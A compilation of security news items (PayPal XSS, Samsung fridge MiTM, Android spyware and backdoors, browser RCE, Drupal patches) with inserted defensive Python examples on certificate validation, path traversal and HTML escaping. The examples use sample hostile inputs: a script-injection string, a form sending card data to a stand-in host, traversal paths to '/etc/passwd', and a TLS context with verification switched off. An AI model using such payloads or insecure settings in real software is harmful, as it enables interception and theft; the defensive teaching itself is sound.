PayPal fixes serious vulnerability in its domain

Photo Courtesy: Security Down

A serious flaw in a domain of PayPal Holdings Inc, the American company that operates a worldwide online payments system, has been patched. The flaw could have allowed an attacker to trick users into handing over their personal and financial details.

The flaw, which was detected by Ebrahim Hegazy, was a stored cross-site scripting (XSS) bug in the SecurePayments.PayPal.com domain. That domain hosts PayPal’s hosted checkout solution, which lets buyers pay with a payment card or their PayPal account so that the merchant never has to capture or store sensitive payment information.

“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content. An attacker can provide his own HTML forms to the user to fulfill and send the user's data back to the attacker’s server in clear text format, and then use this information to purchase anything on behalf of users or even transfer the user's funds to his own account,” the researcher posted in his blog.

According to the Egypt-based researcher, a malicious actor could have set up a rogue shopping site or hijacked a legitimate website, and altered its “Checkout” button to point at a URL designed to exploit the XSS vulnerability.

The flaw could allow the attacker to change the contents of the SecurePayments page and display a phishing page where the victim is instructed to enter personal and financial information. The collected data is then sent back to a server controlled by the attacker, the researcher explained.

The researcher, who had found a serious flaw in a Yahoo domain last year, reported the vulnerability to PayPal on June 19. The payment processor confirmed patching the flaw on August 25.


PayPal then awarded Hegazy $750 for his findings, which is said to be the company's maximum bug bounty payout for XSS vulnerabilities.

Facebook to bring “Video Matching Technology” to control Piracy


Here is some good news for video creators who are fed up with video piracy, especially on social networking sites: Facebook is planning to launch a “Video Matching Technology” that will inform the real owners of a video when it is uploaded by others.

A news report published in ReCode confirms that, in order to control video piracy on Facebook, the company has decided to build the technology.

“We’ve heard from some of our content partners that third parties too frequently misuse their content on Facebook,” Facebook posted in its blog. “It’s not fair to those who work hard to create amazing videos. We want creators to get credit for the videos that they own.”

It is said that the company and its partners have started testing the new technology, which requires content owners to upload the clips they want to protect into Facebook’s system.

“It is the first step to creating the equivalent of YouTube’s Content ID system, which the video giant built up over years as a response to its own copyright/piracy problems. After years of ignoring video, Facebook is now a major player, so this kind of effort was obvious and overdue,” the news report reads.

“Facebook’s response comes after video makers and distributors have grown increasingly vocal about pirated videos, which by one estimate accounted for more than 70 percent of Facebook’s most popular videos. In May, Jukin Media, a video licensing agency best known for ‘Fail’ clips, described Facebook’s copyright problems as ‘massive.’ In June, Fullscreen CEO George Strompolos, who runs one of the biggest YouTube video networks, tweeted that he was ‘getting very tired of seeing our videos ripped there with no way to monitor or monetize,’” the news report reads.

Now Facebook says Jukin and Fullscreen are two of its initial launch partners for the new technology, along with Zefr, a service company that helps content owners track their clips on YouTube. Facebook says it is also working with major media companies on the effort, but won’t identify them.


$376,000 for Informer in Ashley Madison hacking case

Avid Life Media (ALM), the parent company of Ashley Madison, is offering $500,000 (Canadian dollars) in prize money for any information leading to the “identification, arrest and prosecution” of the hackers responsible for the recent hack of the website.

Avid Life Media confirmed that the data Impact Life stole is genuine.

A legal investigation has been started. With the help of the Toronto police department and “white hat” hackers, the company hopes to find the perpetrators.

During a press conference, acting superintendent Bryce Evans said that hackers have “certain techniques to help us and assist us.” He also said that the police would lean on their “good working relationship” with the US agencies, the FBI and Homeland Security.

Explaining why the Toronto police and ALM are motivated to find the hackers responsible for the data breach, Evans referred to two suicides that appear to be related to the Ashley Madison breach, and to “spin-off crimes and further victimization” by people accessing the hacked data.

$500,000 Canadian dollars amounts to about $376,000 US dollars.

Samsung smart fridge vulnerability can expose Gmail credentials, say experts

A recent update by a team of security researchers has identified a potential threat to Gmail credentials via the Samsung Smart Fridge.

A ‘Man in the Middle’ (MiTM) vulnerability was discovered during an IoT (Internet of Things) hacking challenge at the recent DEF CON conference. Samsung’s RF28HMELBSR smart fridge was targeted to confirm the potential breach of Gmail account credentials. Although the fridge implements SSL, it fails to validate SSL certificates, which is what gives rise to the MiTM vulnerability.

The Internet-connected device can automatically download the owner's Google calendar to an on-screen interface, and the MiTM vulnerability lets a hacker who joins the same network steal the Gmail credentials of their neighbours.

Ken Munro, a security researcher at Pen Test Partners, stated: "The internet-connected fridge is designed to display Gmail Calendar information on its display. It appears to work the same way that any device running a Gmail calendar does. A logged-in user/owner of the calendar makes updates and those changes are then seen on any device that a user can view the calendar on."

"While SSL is in place, the fridge fails to validate the certificate. Hence, hackers who manage to access the network that the fridge is on (perhaps through a de-authentication and fake Wi-Fi access point attack) can Man-In-The-Middle the fridge calendar client and steal Google login credentials from their neighbours, for example."
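The failure Munro describes is a client that completes the TLS handshake but never checks who it is talking to. The following Python is an added example, not Pen Test Partners' code nor anything from the fridge firmware: it shows the two checks a calendar client must perform on the peer certificate (name match and validity period; chain verification against trusted CAs is the TLS library's job) and contrasts the `ssl` context a client should use with a context that reproduces the fridge's mistake. The certificate dictionaries, the host name `calendar.google.com`, and the "current time" are constructed for the example.

```python
import ssl

# Constructed certificate dicts in the shape ssl.SSLSocket.getpeercert() returns.
# Names, dates and the "attacker" certificate are made up for this example.
GOOD_CERT = {
    "subject": ((("commonName", "*.google.com"),),),
    "subjectAltName": (("DNS", "*.google.com"), ("DNS", "google.com")),
    "notBefore": "Jan  1 00:00:00 2015 GMT",
    "notAfter": "Dec 31 23:59:59 2015 GMT",
}
# What a man-in-the-middle on the same Wi-Fi can present: a certificate for a name
# it does control. A client that skips validation accepts this without complaint.
MITM_CERT = {
    "subject": ((("commonName", "fridge-proxy.example"),),),
    "subjectAltName": (("DNS", "fridge-proxy.example"),),
    "notBefore": "Jan  1 00:00:00 2015 GMT",
    "notAfter": "Dec 31 23:59:59 2015 GMT",
}
CALENDAR_HOST = "calendar.google.com"  # assumed name the fridge expects to reach
NOW = ssl.cert_time_to_seconds("Aug 25 00:00:00 2015 GMT")          # constructed clock
AFTER_EXPIRY = ssl.cert_time_to_seconds("Jan  1 00:00:00 2016 GMT")  # constructed clock


def _name_matches(pattern, hostname):
    """RFC 6125-style comparison: a wildcard is allowed only as the entire leftmost
    label and matches exactly one label; otherwise a case-insensitive equality."""
    pattern, hostname = pattern.lower(), hostname.lower()
    if "*" not in pattern:
        return pattern == hostname
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def hostname_matches(cert, hostname):
    """True if the hostname is covered by a DNS subjectAltName; the commonName is
    consulted only when the certificate carries no SAN at all."""
    sans = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if sans:
        return any(_name_matches(san, hostname) for san in sans)
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                return _name_matches(value, hostname)
    return False


def validate_peer_cert(cert, hostname, now):
    """Return the list of failed checks; an empty list means the certificate is
    acceptable for this hostname at this time."""
    problems = []
    if not hostname_matches(cert, hostname):
        problems.append("hostname mismatch")
    if now < ssl.cert_time_to_seconds(cert["notBefore"]):
        problems.append("not yet valid")
    if now > ssl.cert_time_to_seconds(cert["notAfter"]):
        problems.append("expired")
    return problems


def calendar_client_context(insecure=False):
    """TLS context a calendar client should use. create_default_context() loads the
    platform CA store, requires a valid chain and checks the hostname. insecure=True
    reproduces the fridge's mistake: SSL is 'in place' but nothing is verified."""
    ctx = ssl.create_default_context()
    if insecure:
        ctx.check_hostname = False  # must be cleared before verify_mode may drop
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_validates_peer(ctx):
    """The two settings a code review should look for in any embedded TLS client."""
    return bool(ctx.check_hostname) and ctx.verify_mode == ssl.CERT_REQUIRED


if __name__ == "__main__":
    print("legit cert:", validate_peer_cert(GOOD_CERT, CALENDAR_HOST, NOW) or "ok")
    print("MITM cert :", validate_peer_cert(MITM_CERT, CALENDAR_HOST, NOW))
    print("secure ctx validates:", context_validates_peer(calendar_client_context()))
    print("fridge ctx validates:", context_validates_peer(calendar_client_context(insecure=True)))
```

When reviewing an IoT client, the settings checked by `context_validates_peer` are the first thing to look for: a context created with `check_hostname = False` or `verify_mode = CERT_NONE` (or a custom trust callback that always returns true) turns the encrypted channel into one that any device on the same Wi-Fi can terminate.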

While the research team failed to breach the software update server and the fridge terminal during the DEF CON hacking spree, the mobile app showed glitches with potential security implications.

The mobile app's code contains a certificate that enables encryption of credentials between the fridge and the mobile app. The certificate is correctly password-protected, but the password to the certificate appears to be stored in the mobile app in an obfuscated form. So, if the obfuscation is broken, it would allow a hacker to send commands to the fridge.

Pedro Venda of Pen Test Partners remarked “We wanted to pull the terminal unit out of the fridge to get physical access to things like a USB port and serial or JTAG interfaces, but ran out of time. However, we still found some interesting bugs that definitely merit further investigation. The MiTM alone is enough to expose a user’s Gmail creds."

This fiasco has created a tense atmosphere at Samsung headquarters. In an open statement, the company said: "At Samsung, we understand that our success depends on consumers’ trust in us, and the products and services that we provide. We are investigating this matter as quickly as possible. Protecting our consumers’ privacy is our top priority, and we work hard every day to safeguard our valued Samsung users.”


20-year-old student pleads guilty to making spy app for Android phones



A 20-year-old student of Carnegie Mellon University has pleaded guilty to developing and selling malicious software that allowed others to remotely control Google Android phones, including using the phones' cameras to spy on their owners.

Morgan Culbertson, a resident of Churchill, could face up to 10 years in prison and $250,000 in fines when he is sentenced Dec. 2.

However, even after his court appearance before a federal judge in Pittsburgh, it is unclear how many phones were actually infected by the malicious software.

It is said that if anyone’s phone gets infected by the app, it can be remotely controlled by others and used to spy and secretly take pictures without the phone owner's knowledge. It also records calls, intercepts text messages and otherwise steals information the owners downloaded onto the devices.

According to a news report published in IndiaToday, he is one of 12 people charged by U.S. authorities, and the fourth to plead guilty so far, in the worldwide takedown of the Darkode.com cybercriminal marketplace.

Almost 70 other people have been targeted for allegedly using the cybercriminal marketplace where hackers bought and sold malicious software.

"I committed the crime, so I am responsible," Culbertson said after pleading guilty, according to the Pittsburgh Tribune-Review. "I understand what I did was wrong and I take full responsibility. I would like in the future to use my skills to help protect people."

Assistant U.S. Attorney Jimmy Kitchen said that Culbertson worked online with a man identified only as "Mike from the Netherlands" to create Dendroid, the malware that was secretly linked to Android phone apps available for purchase through Google Play.

Security flaw detected in popular Dolphin and Mercury browsers

Rotologix, a cyber-security enthusiast, has found zero-day flaws that could allow an attacker to perform remote code execution in two popular Android mobile browsers, Dolphin and Mercury, which have 100 million users.

The remote code execution exploit allows an attacker to replace the browser's theme package with an infected counterpart.

“The Mercury Browser for Android suffers from an insecure Intent URI scheme implementation and a path traversal vulnerability within a custom web server used to support its WiFi Transfer feature. Chaining these vulnerabilities together can allow a remote attacker to perform arbitrary reading and writing of files within the Mercury Browser's data directory,” the researcher posted in a blog post.

It is said that the exploit allows attackers to modify the browser's functions for downloading and applying new themes. Those who are affected need to download and apply a new Dolphin browser theme again.


And for Dolphin, Rotologix said, "An attacker with the ability to control the network traffic for users of the Dolphin browser for Android, can modify the functionality of downloading and applying new themes for the browser. Through the exploitation of this functionality, an attacker can achieve an arbitrary file write, which can then be turned into code execution within the context of the browser on the user's device.”
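Both findings come down to a file path that the application trusted: a request path handed to Mercury's WiFi Transfer web server, and a write location derived from a theme package in Dolphin. The following Python is an added example, not code from either browser or from Rotologix: it shows the guard a small file server or package installer should apply before reading or writing, namely resolving the decoded path and refusing anything that lands outside the directory the feature is allowed to touch. The directory layout and file contents are constructed for the example.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_under_root(root, requested):
    """Map a client-supplied path onto a location inside root, or return None if the
    request would escape it. The check runs on the decoded, normalised, symlink-resolved
    path, i.e. on what the filesystem would actually open."""
    root = os.path.realpath(root)
    decoded = unquote(requested)             # "..%2F" must be caught the same as "../"
    relative = decoded.lstrip("/\\")          # an absolute request may not replace root
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def read_file(root, requested):
    """What a transfer server's GET handler should do: refuse anything outside root."""
    path = resolve_under_root(root, requested)
    if path is None or not os.path.isfile(path):
        return None
    with open(path, "rb") as handle:
        return handle.read()


def write_file(root, requested, data):
    """The same guard on the write side (uploads, unpacked theme packages)."""
    path = resolve_under_root(root, requested)
    if path is None:
        return False
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as handle:
        handle.write(data)
    return True


def build_demo_tree():
    """Constructed layout standing in for an app's private data directory: a 'transfer'
    folder that may be served, and a sibling preferences file that must never leak."""
    base = tempfile.mkdtemp(prefix="transfer_demo_")
    shared = os.path.join(base, "app_data", "transfer")
    os.makedirs(shared)
    with open(os.path.join(shared, "photo.jpg"), "wb") as handle:
        handle.write(b"constructed image bytes")
    with open(os.path.join(base, "app_data", "prefs.xml"), "wb") as handle:
        handle.write(b"<prefs><token>constructed-secret</token></prefs>")
    return base, shared


if __name__ == "__main__":
    _, root = build_demo_tree()
    for req in ("photo.jpg", "../prefs.xml", "..%2Fprefs.xml", "/etc/passwd"):
        print(f"{req!r:22} -> {read_file(root, req)!r}")
```

The order of operations matters: decode first, then normalise with `realpath`, then compare against the root with `commonpath`. Checking the raw string for `..` would miss the percent-encoded form, and a plain prefix comparison would accept a sibling directory whose name merely starts with the root's name.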

Researchers detect a new Android Trojan targeting users from China

Photo Courtesy: Dr. Web

Security researchers from Doctor Web, a Russian anti-virus software developer, have detected another new Android Trojan, which is said to be distributed among users in China to spy on its victims.

Previously, the researchers had found an Android Trojan that spreads as a security certificate, tricking users into thinking it must be installed on their device. That Trojan undermined two-step authentication by infecting users' devices with malware capable of intercepting their messages and forwarding them to cybercriminals.

The Trojan dubbed Android.Backdoor.260.origin can intercept SMS messages, record phone calls, track GPS coordinates of the infected device, take screenshots, and even collect data entered by the user.

“Due to the fact that Android.Backdoor.260.origin is distributed as “AndroidUpdate”, potential victims are very likely to install it on their mobile devices,” the researchers posted in a blog.

According to the researchers, the Trojan's main malicious features are implemented in special modules incorporated into the malware's software package. Once activated, the Trojan extracts the following additional components: super, detect, liblocSDK4b.so, libnativeLoad.so, libPowerDetect.cy.so, 1.dat, libstay2.so, libsleep4.so, substrate_signed.apk and cInstall.

“Next, it tries to run the binary cInstall file (detected by Dr.Web as Android.BackDoor.41) with root privileges. If the attempt is successful, this malicious module plants a number of files extracted earlier into system folders and tries to stealthily install a utility called “Substrate”. This tool expands functionality of applications and is used by Android.Backdoor.260.origin to intercept entered data. If the Trojan does not succeed in acquiring root privileges, then, most likely, it will fail to install necessary components. As a result, the malware will not be able to perform the majority of its functions properly,” the researchers added.

Once all the modules are installed, the Trojan removes the shortcut it created earlier and launches a malicious service called PowerDetectService, which runs the malicious module named libnativeLoad.so. That module has also been added to the Dr.Web virus database under the name Android.BackDoor.42, together with Substrate.

“In fact, this tool is not actually malicious and can be easily downloaded from Google Play. However, cybercriminals have modified the original application and incorporated the new version into Android.Backdoor.260.origin. As a result, the tool became potentially dangerous for mobile devices' users,” the researchers explained.

The researchers have warned users not to install applications from unreliable sources, and to protect their mobile devices with reliable anti-virus software.

Chinese hackers targeting Indian institutions to steal information

If FireEye Inc, a US-based cyber security firm, is to be believed, hackers based in China are now targeting India to steal information about its border disputes and diplomatic intelligence.

The relationship between the two countries broke down in 1962 when they fought each other over border issues. However, relations have eased somewhat since the Modi government came to power.

It is also said that the hackers were active a month before PM Modi's visit to China. Now, it seems the cyber threat could make things as bad as they were before.

As per the company, an advanced campaign over the past four years has targeted more than 100 people, 70 percent of whom are in India. Earlier this year it identified a decade-long cyber espionage operation against businesses and governments in Southeast Asia.

“These attacks on India and its neighbouring countries reflect growing interest in its foreign affairs,” Bryce Boland, FireEye’s chief technology officer for Asia Pacific, said in the statement.

Along with the Indian institutions, the hackers also targeted Tibetan activists and others in Southeast Asia, in particular government, diplomatic, scientific and educational organizations, the security company said.

According to a news report published in The Financial Times, the hackers sent so-called spear phishing e-mails with Microsoft Word attachments appearing to relate to regional issues. Those messages contained a script which would create a “backdoor” in infected machines, allowing access to programs without detection by security measures.


Security vulnerabilities fixed in latest Drupal versions

After addressing several vulnerabilities, Drupal has asked its users to upgrade their existing Drupal 7 and 6 sites.

An XSS vulnerability was found in the auto-complete functionality of forms, as the requested URL was not sanitized properly; it affected both Drupal 6 and 7. The flaw could allow an attacker to upload files to vulnerable websites under another user’s account.

“For security reasons, the autocomplete system now makes Ajax requests to non-clean URLs only, although protection is also in place for custom code that does so using clean URLs,” Drupal explained.
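The PayPal story above and this Drupal autocomplete bug share one root cause: attacker-influenced text (a stored field in one case, a request URL in the other) is written into the page without being encoded for the context it lands in. The following Python is an added example, not code from PayPal, Drupal or either advisory, and it illustrates the general defence (context-appropriate output encoding) rather than Drupal's specific fix: a deliberately unsafe renderer beside its hardened form, plus a small check that can be run over rendered output in a test suite. The inputs, tag names and the `collector.example` host are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker-controlled inputs, not payloads from either advisory: a stored
# merchant field that lands in page text (the PayPal case) and a request URL that is
# reflected into an attribute (the Drupal autocomplete case).
STORED_FIELD = '<form action="http://collector.example/submit"><input name="card"></form>'
REQUEST_URL = '/autocomplete?q="><script>alert(1)</script>'


def render_unsafe(field, request_url):
    """String concatenation straight into markup: the defect behind a stored XSS
    (field) and a reflected one (request_url)."""
    return (f'<p class="merchant">{field}</p>\n'
            f'<input type="text" data-autocomplete-url="{request_url}">')


def safe_url(url):
    """Only http(s) and site-relative URLs may be placed in a URL-valued attribute;
    any other scheme (javascript:, data:, ...) is replaced with a harmless anchor."""
    if urlsplit(url).scheme.lower() in ("", "http", "https"):
        return url
    return "#"


def render_safe(field, request_url):
    """Encode for the context the value lands in: html.escape() turns <, >, &, ' and "
    into entities, so the browser shows the input as text instead of parsing it."""
    return (f'<p class="merchant">{html.escape(field)}</p>\n'
            f'<input type="text" data-autocomplete-url="{html.escape(safe_url(request_url))}">')


def injected_tags(document):
    """Tags this template never emits on its own; any of them in the output means an
    untrusted value was parsed as markup. Usable as a regression check in tests."""
    lowered = document.lower()
    return [tag for tag in ("<script", "<form", "<iframe", "<img") if tag in lowered]


if __name__ == "__main__":
    print("unsafe:", injected_tags(render_unsafe(STORED_FIELD, REQUEST_URL)))
    print("safe  :", injected_tags(render_safe(STORED_FIELD, REQUEST_URL)))
    print(render_safe(STORED_FIELD, REQUEST_URL))
```

Two points the comparison makes: escaping must happen at output time, per context (the attribute value needs quote escaping, which `html.escape` does by default), and a URL-valued attribute needs a scheme allow-list on top of escaping, because `javascript:` survives entity encoding untouched. Real template engines provide this as context-aware autoescaping; the manual version here just makes the rule visible.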

Drupal, which is used by more than 1.1 million websites, published a security advisory on August 19 confirming that it had patched several vulnerabilities in versions 7.39 and 6.37.

It revealed that version 7 was affected by a cross-site scripting (XSS) vulnerability that could allow an attacker to launch attacks by invoking Drupal.ajax() on a whitelisted HTML element.

Drupal developers warn that version 7 of the CMS is plagued by a SQL injection vulnerability that allows an attacker with elevated privileges to inject malicious code in SQL comments. The flaw, found in the SQL comment filtering system, can only be exploited via one contributed module.

“When form API token validation fails (for example, when a cross-site request forgery attempt is detected, or a user tries to submit a form after having logged out and back in again in the meantime), the form API now skips calling form element value callbacks, except for a select list of callbacks provided by Drupal core that are known to be safe. In rare cases, this could lead to data loss when a user submits a form and receives a token validation error, but the overall effect is expected to be minor,” Drupal said in the advisory.

The last vulnerability patched in Drupal 6 and 7 is an information disclosure issue related to menu links.

“Users without the ‘access content’ permission can see the titles of nodes that they do not have access to, if the nodes are added to a menu on the site that the users have access to,” reads Drupal’s advisory.

The vulnerabilities affect Drupal core 6.x versions prior to 6.37 and Drupal core 7.x versions prior to 7.39. CVE identifiers have yet to be assigned to these vulnerabilities.

"Cyber of Emotion" hacks Saudi websites

Many Saudi websites were hacked by a group that had given warnings that it would carry out the attacks. The group, known as “Cyber of Emotion”, hacked more than 24 government websites over a period of two hours.

As reported by the Al-Riyadh newspaper, visitors to the websites were directed to a page that read: “We do not want to harm the site. Had it been hacked by enemies, your personal information, emails and registration data would have been compromised.”

The hackers said their team had already warned the administrators that the websites were not properly secured and that they should do something about it, but the warnings were ignored, they claim.

The newspaper reported that the hacked websites included those of government hospitals, municipalities, education departments, social development offices and health departments.

The websites, however, started working properly a few hours after the attack.

Last year, the Twitter account of the Ministry of Justice was hacked by the same group.